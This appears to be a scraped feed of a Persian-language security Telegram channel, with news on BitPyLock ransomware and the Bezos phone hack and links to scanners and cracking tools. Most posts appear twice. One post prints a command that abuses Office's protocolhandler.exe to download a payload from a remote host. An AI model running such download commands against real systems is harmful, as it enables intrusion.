باج افزار جدیدی با نام BitPyLock قبل از رمزنگاری اطلاعات، آنها را میدزدد و تهدید به انتشار داده ها میکند.
این باج افزار در نسخه های جدید خود برای رمزگشایی از تمام شبکه ی آلوده ۵ بیت کوین درخواست می نماید.
اطلاعات بیشتر:
https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/
#ransomware
#news
@sec_nerd
این باج افزار در نسخه های جدید خود برای رمزگشایی از تمام شبکه ی آلوده ۵ بیت کوین درخواست می نماید.
اطلاعات بیشتر:
https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/
#ransomware
#news
@sec_nerd
BleepingComputer
BitPyLock Ransomware Now Threatens to Publish Stolen Data
A new ransomware called BitPyLock has quickly gone from targeting individual workstations to trying to compromise networks and stealing files before encrypting devices.
استخراج لیست ارتباطات RDP با استفاده از اسکریپت پاورشل
https://github.com/3gstudent/List-RDP-Connections-History
#ps
#windows
#rdp
@sec_nerd
https://github.com/3gstudent/List-RDP-Connections-History
#ps
#windows
#rdp
@sec_nerd
GitHub
GitHub - 3gstudent/List-RDP-Connections-History: Use powershell to list the RDP Connections History of logged-in users or all users
Use powershell to list the RDP Connections History of logged-in users or all users - 3gstudent/List-RDP-Connections-History
محمدبن سلمان، شاهزاده ی سعودی متهم به هک کردن گوشی مالک آمازون Jeff Bezos !
بنابر گزارش گاردین بن سلمان پس از سفرهای متوالی به امریکا و ارتباط با بخش تکنولوژی این کشور و برقراری رابطه های نزدیک با مالکان شرکت های بزرگ، با جلب اعتماد آنها اقدام به آلوده کردن گوشی Jeff Bezos کرده است!
طبق این گزارش بن سلمان فایل ویدیویی را در واتس اپ برای جف ارسال کرده است که منشاء اصلی آلوده شدن و استخراج اطلاعات شخصی از تلفن همراه او بوده.
سعودی ها که در مسئله قتل جمال خاشقچی متهم اصلی ماجرا هستند اکنون متهم به هک کردن گوشی مالک آمازون شده اند.
طبق تحقیقات تیم امنیتی آمازون، عملیات هک گوشی جف دقیقا بعد از ارسال یک فایل از سوی محمدبن سلمان برای جف آغاز شده و برخی کارشناسان سعودی معتقدند جف به این دلیل هدف قرار گرفته است که وی مالک واشنگتن پست است و این روزنامه تمرکز زیادی بر روی قتل جمال خاشقچی دارد (جمال خبرنگار واشنگتن پست بود) و این مسئله باعث ایجاد اختلال در فعالیت های بن سلمان در نظام پادشاهی سعودی شده است.
هرچند سفارت سعودی در امریکا این اتهامات را چرند خوانده است اما تحقیقات تیم امنیتی آمازون بر روی این مسئله ادامه دارد.
https://www.theguardian.com/technology/2020/jan/21/amazon-boss-jeff-bezoss-phone-hacked-by-saudi-crown-prince
نکته: تصور کنید که گوشی مالک آمازون هک شده، فکر میکنید مسئولان و سیاستمداران کشور ما چقدر در امان هستند از این حملات؟ در مذاکرات و جلسات مختلف چقدر مسئولان ما دقت میکنن به اهمیت این موضوع؟ ممکنه عده ای بگن که مسئولان ما خیلی حواسشون هست و در هیچ جلسه ای حتی گوشی هم نمیبرن اما پیشنهاد میکنم کتاب «بدون هراس» وندی شرمن رو بخونید تا ببینید چقدر اینها مراقبن!!
#news
#ksa
#usa
#amazon
#scandal
@sec_nerd
بنابر گزارش گاردین بن سلمان پس از سفرهای متوالی به امریکا و ارتباط با بخش تکنولوژی این کشور و برقراری رابطه های نزدیک با مالکان شرکت های بزرگ، با جلب اعتماد آنها اقدام به آلوده کردن گوشی Jeff Bezos کرده است!
طبق این گزارش بن سلمان فایل ویدیویی را در واتس اپ برای جف ارسال کرده است که منشاء اصلی آلوده شدن و استخراج اطلاعات شخصی از تلفن همراه او بوده.
سعودی ها که در مسئله قتل جمال خاشقچی متهم اصلی ماجرا هستند اکنون متهم به هک کردن گوشی مالک آمازون شده اند.
طبق تحقیقات تیم امنیتی آمازون، عملیات هک گوشی جف دقیقا بعد از ارسال یک فایل از سوی محمدبن سلمان برای جف آغاز شده و برخی کارشناسان سعودی معتقدند جف به این دلیل هدف قرار گرفته است که وی مالک واشنگتن پست است و این روزنامه تمرکز زیادی بر روی قتل جمال خاشقچی دارد (جمال خبرنگار واشنگتن پست بود) و این مسئله باعث ایجاد اختلال در فعالیت های بن سلمان در نظام پادشاهی سعودی شده است.
هرچند سفارت سعودی در امریکا این اتهامات را چرند خوانده است اما تحقیقات تیم امنیتی آمازون بر روی این مسئله ادامه دارد.
https://www.theguardian.com/technology/2020/jan/21/amazon-boss-jeff-bezoss-phone-hacked-by-saudi-crown-prince
نکته: تصور کنید که گوشی مالک آمازون هک شده، فکر میکنید مسئولان و سیاستمداران کشور ما چقدر در امان هستند از این حملات؟ در مذاکرات و جلسات مختلف چقدر مسئولان ما دقت میکنن به اهمیت این موضوع؟ ممکنه عده ای بگن که مسئولان ما خیلی حواسشون هست و در هیچ جلسه ای حتی گوشی هم نمیبرن اما پیشنهاد میکنم کتاب «بدون هراس» وندی شرمن رو بخونید تا ببینید چقدر اینها مراقبن!!
#news
#ksa
#usa
#amazon
#scandal
@sec_nerd
the Guardian
Jeff Bezos hack: Amazon boss's phone 'hacked by Saudi crown prince'
Exclusive: investigation suggests Washington Post owner was targeted five months before murder of Jamal Khashoggi
پورت اسکنر naabu که به زبان Go نوشته شده است و قابلیت اسکن های SYN با سرعت بالا را دارد.
https://github.com/projectdiscovery/naabu
#pentest
#tools
@sec_nerd
https://github.com/projectdiscovery/naabu
#pentest
#tools
@sec_nerd
ابزار اسکنر SN1PER که برای تیم های تست نفوذ و پروژه های گسترده مناسب است.
از امکانات این ابزار میتوان به داشبورد کاربرپسند، جمع آوری و نمایش جذاب اسکرین شاتها، جستجو در بین اهداف و پروژه ها، گزارشاتی همراه با جزییات بیشتر در خصوص هاست های هدف و خروجی گرافیکی از اسکن های nmap اشاره کرد.
https://github.com/1N3/Sn1per
#tools
#pentest
#scanner
@sec_nerd
از امکانات این ابزار میتوان به داشبورد کاربرپسند، جمع آوری و نمایش جذاب اسکرین شاتها، جستجو در بین اهداف و پروژه ها، گزارشاتی همراه با جزییات بیشتر در خصوص هاست های هدف و خروجی گرافیکی از اسکن های nmap اشاره کرد.
https://github.com/1N3/Sn1per
#tools
#pentest
#scanner
@sec_nerd
امنیت اطلاعات
محمدبن سلمان، شاهزاده ی سعودی متهم به هک کردن گوشی مالک آمازون Jeff Bezos ! بنابر گزارش گاردین بن سلمان پس از سفرهای متوالی به امریکا و ارتباط با بخش تکنولوژی این کشور و برقراری رابطه های نزدیک با مالکان شرکت های بزرگ، با جلب اعتماد آنها اقدام به آلوده کردن…
گزارش فنی و جزییات بیشتری از هک شدن گوشی Jeff Bezos توسط شرکت امنیت سایبری FTI منتشر شد
گزارش بسیار مشروح و جالب هست اما ما فقط برخی نکات اون رو در این پست میاریم:
۱- سعود القحطانی دوست و مشاور بن سلمان است و مسئولیت امنیت سایبری، برنامه نویسی و پهپادهای عربستان را برعهده دارد و ارتباط نزدیکی با HackingTeam ایتالیا داشته و ۲۰ درصد از سهام این شرکت را به نمایندگی از این رژیم خریده است. طبق ایمیلهای افشا شده از هکینگ تیم در سال ۲۰۱۵، القحطانی از آنها خواسته است امکان آلوده سازی گوشی ها با ارسال یک ویدیو در واتس اپ را بررسی کنند!
۲-ترافیک خروجی از گوشی جف پس از دریافت ویدیو از بن سلمان از ۴۳۰ کیلوبایت در روز به ۱۲۶ مگابایت در روز افزایش یافت!
۳- پس از آن و چند ماه بعد از سوی بن سلمان تصویر زنی برای جف ارسال شد که جف با او روابط مخفیانه ای داشت و در آن زمان کسی از این ارتباط با خبر نبود. این زن Lauren Sanchez نام دارد.
۴- در ماه های پس از آلوده شدن گوشی، جف در یک جلسه شرکت کرد که گزارشی از میزان حملات کمپین سعودی ها علیه وی را دریافت کند (به خاطر قتل خاشقچی) و بلافاصله و پس از مدت زیادی که پیامی بین او و بن سلمان رد و بدل نشده بود، بن سلمان با ارسال پیامی به او گفت که حرفهایی که میشنود را باور نکند و او یا عربستان هیچ عملی علیه جف انجام نداده اند. این در حالیست که این جلسه به هیچ عنوان عمومی نبوده است.
۵- هیچ یک از ارتباطات و لینک های برقرار شده از گوشی جف به سرور C2 متصل نشده اند ولی با استفاده از یک شبکه سندباکس شده سعی شده است که ترافیک گوشی بررسی شود اما بعضی بدافزارهای پیشرفته با روشهای خاص خود از این کار جلوگیری میکنند و در برخی موارد سندباکس ها را تشخیص میدهند.
۶- نکته جالب اما این است که ویدیوی ارسالی از طریق یک دانلودر رمزنگاری شده که بر روی سرور مدیای واتس اپ قرار دارد ارسال شده است. فایل ویدیو کد مشکوکی ندارد اما امکان بررسی این دانلودر وجود نداشته است.
گزارش کامل؛
https://assets.documentcloud.org/documents/6668313/FTI-Report-into-Jeff-Bezos-Phone-Hack.pdf
#ksa
#mbs
#amazon
#news
#whatsapp
@sec_nerd
گزارش بسیار مشروح و جالب هست اما ما فقط برخی نکات اون رو در این پست میاریم:
۱- سعود القحطانی دوست و مشاور بن سلمان است و مسئولیت امنیت سایبری، برنامه نویسی و پهپادهای عربستان را برعهده دارد و ارتباط نزدیکی با HackingTeam ایتالیا داشته و ۲۰ درصد از سهام این شرکت را به نمایندگی از این رژیم خریده است. طبق ایمیلهای افشا شده از هکینگ تیم در سال ۲۰۱۵، القحطانی از آنها خواسته است امکان آلوده سازی گوشی ها با ارسال یک ویدیو در واتس اپ را بررسی کنند!
۲-ترافیک خروجی از گوشی جف پس از دریافت ویدیو از بن سلمان از ۴۳۰ کیلوبایت در روز به ۱۲۶ مگابایت در روز افزایش یافت!
۳- پس از آن و چند ماه بعد از سوی بن سلمان تصویر زنی برای جف ارسال شد که جف با او روابط مخفیانه ای داشت و در آن زمان کسی از این ارتباط با خبر نبود. این زن Lauren Sanchez نام دارد.
۴- در ماه های پس از آلوده شدن گوشی، جف در یک جلسه شرکت کرد که گزارشی از میزان حملات کمپین سعودی ها علیه وی را دریافت کند (به خاطر قتل خاشقچی) و بلافاصله و پس از مدت زیادی که پیامی بین او و بن سلمان رد و بدل نشده بود، بن سلمان با ارسال پیامی به او گفت که حرفهایی که میشنود را باور نکند و او یا عربستان هیچ عملی علیه جف انجام نداده اند. این در حالیست که این جلسه به هیچ عنوان عمومی نبوده است.
۵- هیچ یک از ارتباطات و لینک های برقرار شده از گوشی جف به سرور C2 متصل نشده اند ولی با استفاده از یک شبکه سندباکس شده سعی شده است که ترافیک گوشی بررسی شود اما بعضی بدافزارهای پیشرفته با روشهای خاص خود از این کار جلوگیری میکنند و در برخی موارد سندباکس ها را تشخیص میدهند.
۶- نکته جالب اما این است که ویدیوی ارسالی از طریق یک دانلودر رمزنگاری شده که بر روی سرور مدیای واتس اپ قرار دارد ارسال شده است. فایل ویدیو کد مشکوکی ندارد اما امکان بررسی این دانلودر وجود نداشته است.
گزارش کامل؛
https://assets.documentcloud.org/documents/6668313/FTI-Report-into-Jeff-Bezos-Phone-Hack.pdf
#ksa
#mbs
#amazon
#news
@sec_nerd
امنیت اطلاعات
گزارش فنی و جزییات بیشتری از هک شدن گوشی Jeff Bezos توسط شرکت امنیت سایبری FTI منتشر شد گزارش بسیار مشروح و جالب هست اما ما فقط برخی نکات اون رو در این پست میاریم: ۱- سعود القحطانی دوست و مشاور بن سلمان است و مسئولیت امنیت سایبری، برنامه نویسی و پهپادهای…
کارشناسان ابهامات متعددی را در خصوص گزارش شرکت FTI مطرح کرده اند.
با توجه به گزارش FTI که بصورت عمومی منتشر شده نقاط تاریکی در ماجرا دیده میشود که نمیتوان با قطعیت به این نتیجه رسید که چه کسی و چگونه گوشی جف را هک کرده است.
سوال اول این است که چرا FTI نتوانست دانلودر را رمزگشایی کند؟
بطور معمول کلیدهای رمزنگاری در کنار فایل enc. مورد اشاره در گزارش وجود دارند و امکان رمزگشایی این فایل با کلیدها وجود دارد. در صورتی که هکرها حمله را طوری طراحی کرده باشند که کلیدها یا دانلودر را نابود کرده باشند امکان رمزگشایی آن وجود ندارد. هر دو سناریو امکانپذیر است اما در گزارش مشخص نیست که دلیل ناتوانی FTI برای رمزگشایی دانلودر چه بوده است.
سوال دوم این است که آیا اصلا داده های گزارش صحت دارند؟
طبق این گزارش میزان حجم خروجی از گوشی جف در روزهای عادی بطور متوسط ۴۳۰ کیلوبایت بوده و این مقدار از ترافیک بکگراند بیشتر تلفن ها کمتر است!
و سوال آخر اینکه آیا اصلا بدافزاری وجود داشته؟؟
طبق گزارش FTI هیچ اثری از بدافزار در این بررسی یافت نشده است. ابهام بزرگ این گزارش اینجاست که فقط رفتار غیرعادی گوشی جف مبنای اصلی آلوده شدن آن به بدافزار قرار گرفته و اینکه چرا FTI اقدام به جیل بریک کردن و بررسی فایلهای سیستمی نکرده است.
اگر این شرکت توان لازم برای آنالیز را نداشت میتوانست از فیسبوک و اپل برای رمزگشایی فایل و بررسی گوشی کمک بگیرد و این موضوع جنجالی را به نتیجه ی مشخص و واضحی برساند.
https://www.cyberscoop.com/jeff-bezos-mbs-hack-fti-report-questions/
#news
#amazon
#ksa
#whatsapp
#facebook
#apple
#iphone
@sec_nerd
با توجه به گزارش FTI که بصورت عمومی منتشر شده نقاط تاریکی در ماجرا دیده میشود که نمیتوان با قطعیت به این نتیجه رسید که چه کسی و چگونه گوشی جف را هک کرده است.
سوال اول این است که چرا FTI نتوانست دانلودر را رمزگشایی کند؟
بطور معمول کلیدهای رمزنگاری در کنار فایل enc. مورد اشاره در گزارش وجود دارند و امکان رمزگشایی این فایل با کلیدها وجود دارد. در صورتی که هکرها حمله را طوری طراحی کرده باشند که کلیدها یا دانلودر را نابود کرده باشند امکان رمزگشایی آن وجود ندارد. هر دو سناریو امکانپذیر است اما در گزارش مشخص نیست که دلیل ناتوانی FTI برای رمزگشایی دانلودر چه بوده است.
سوال دوم این است که آیا اصلا داده های گزارش صحت دارند؟
طبق این گزارش میزان حجم خروجی از گوشی جف در روزهای عادی بطور متوسط ۴۳۰ کیلوبایت بوده و این مقدار از ترافیک بکگراند بیشتر تلفن ها کمتر است!
و سوال آخر اینکه آیا اصلا بدافزاری وجود داشته؟؟
طبق گزارش FTI هیچ اثری از بدافزار در این بررسی یافت نشده است. ابهام بزرگ این گزارش اینجاست که فقط رفتار غیرعادی گوشی جف مبنای اصلی آلوده شدن آن به بدافزار قرار گرفته و اینکه چرا FTI اقدام به جیل بریک کردن و بررسی فایلهای سیستمی نکرده است.
اگر این شرکت توان لازم برای آنالیز را نداشت میتوانست از فیسبوک و اپل برای رمزگشایی فایل و بررسی گوشی کمک بگیرد و این موضوع جنجالی را به نتیجه ی مشخص و واضحی برساند.
https://www.cyberscoop.com/jeff-bezos-mbs-hack-fti-report-questions/
#news
#amazon
#ksa
#apple
#iphone
@sec_nerd
CyberScoop
The big questions from FTI's report on the Jeff Bezos hack
FTI's investigation has raised more questions about what actually happened on the Amazon founder's phone.
دانلود فایل باینری با استفاده از protocolhandler.exe در آفیس
C:\[office installed folder]\root\[version]\
protocolhandler.exe "https://192.168.1.111/cmd.exe"
https://youtu.be/eUTFeRwZxH0
#office
#windows
#pentest
@sec_nerd
C:\[office installed folder]\root\[version]\
protocolhandler.exe "https://192.168.1.111/cmd.exe"
https://youtu.be/eUTFeRwZxH0
#office
#windows
#pentest
@sec_nerd
YouTube
Payload download via Office Binary protocolhandler.exe
C:\[office installed folder]\root\[version]\ protocolhandler.exe "https://192.168.1.111/cmd.exe"
رمزگشایی فایل های رمزنگاری شده ی whatsapp
https://github.com/ddz/whatsapp-media-decrypt
#whatsapp
@sec_nerd
https://github.com/ddz/whatsapp-media-decrypt
@sec_nerd
GitHub
GitHub - ddz/whatsapp-media-decrypt: Decrypt WhatsApp encrypted media files
Decrypt WhatsApp encrypted media files. Contribute to ddz/whatsapp-media-decrypt development by creating an account on GitHub.
معرفی ابزارهای انجام عملیات بر روی پسوردها اعم از کرک، مدیریت و بازیابی
https://www.phishy.website/password-utilities.shtml
#password
#crack
#hashcat
@sec_nerd
https://www.phishy.website/password-utilities.shtml
#password
#crack
#hashcat
@sec_nerd
www.phishy.website
Password Utilities - phishy.website
Password Utilities can be used for management, recovery, cracking, and stress testing your password or phrase.
پیشنهادات NSA در خصوص امنیت سیستم های ابری
https://media.defense.gov/2020/Jan/22/2002237484/-1/-1/0/CSI-MITIGATING-CLOUD-VULNERABILITIES_20200121.PDF
#nsa
#cloud
#security
@sec_nerd
https://media.defense.gov/2020/Jan/22/2002237484/-1/-1/0/CSI-MITIGATING-CLOUD-VULNERABILITIES_20200121.PDF
#nsa
#cloud
#security
@sec_nerd
رایت آپ چالش HTB با نام Hawk
https://medium.com/@ranakhalil101/hack-the-box-hawk-writeup-w-o-metasploit-da80d51defcd
#writeup
#htb
@sec_nerd
https://medium.com/@ranakhalil101/hack-the-box-hawk-writeup-w-o-metasploit-da80d51defcd
#writeup
#htb
@sec_nerd